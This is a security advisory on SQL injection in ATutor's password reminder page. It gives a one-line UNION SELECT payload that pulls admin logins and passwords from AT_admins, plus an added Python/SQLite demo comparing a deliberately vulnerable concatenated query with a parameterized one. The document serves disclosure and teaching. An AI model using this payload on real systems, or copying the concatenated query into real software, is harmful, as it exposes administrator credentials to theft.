ATutor Password_Reminder.PHP SQL Injection Vulnerability

No exploit is required.

The following proof of concept is available.

Go to http://www.example.com/atutor/password_reminder.php and, in the email field, type:

' UNION SELECT login, password, 'your_email@example.com' FROM AT_admins /*
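
The proof-of-concept input above, run against a concatenated lookup and a parameterized one. This is an added example, not ATutor's code and not part of the original advisory. It models the lookup in Python with SQLite instead of PHP with MySQL. The three-column query, the AT_members table, the column layouts and all sample rows are assumptions, inferred from the three-column UNION in the input.

```python
import sqlite3

# Input exactly as given in the proof of concept above.
POC_INPUT = "' UNION SELECT login, password, 'your_email@example.com' FROM AT_admins /*"


def make_db():
    """In-memory database with constructed rows; the schema is an assumption."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE AT_members (login TEXT, password TEXT, email TEXT);
        CREATE TABLE AT_admins  (login TEXT, password TEXT, email TEXT);
        INSERT INTO AT_members VALUES
            ('student1', 'member-secret', 'student1@example.com');
        INSERT INTO AT_admins VALUES
            ('admin', 'admin-secret', 'admin@example.com');
    """)
    return db


def reminder_vulnerable(db, email):
    # Assumed shape of the flaw: the form value is pasted into the SQL text,
    # so a quote in the input ends the string literal and the rest is parsed
    # as SQL. The trailing /* comments out the query's own closing quote.
    sql = ("SELECT login, password, email FROM AT_members "
           "WHERE email='" + email + "'")
    return db.execute(sql).fetchall()


def reminder_parameterized(db, email):
    # Bound parameter: the whole input is compared as one value and is never
    # parsed as SQL, so the UNION and the comment marker stay inert.
    sql = "SELECT login, password, email FROM AT_members WHERE email = ?"
    return db.execute(sql, (email,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for name, lookup in (("concatenated", reminder_vulnerable),
                         ("parameterized", reminder_parameterized)):
        print(name, "normal address:", lookup(db, "student1@example.com"))
        print(name, "PoC input     :", lookup(db, POC_INPUT))
```

With the concatenated query the result row comes from AT_admins and its third column is the address supplied in the input. The parameterized query returns no rows for the same input.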


 

Copyright 2010, SecurityFocus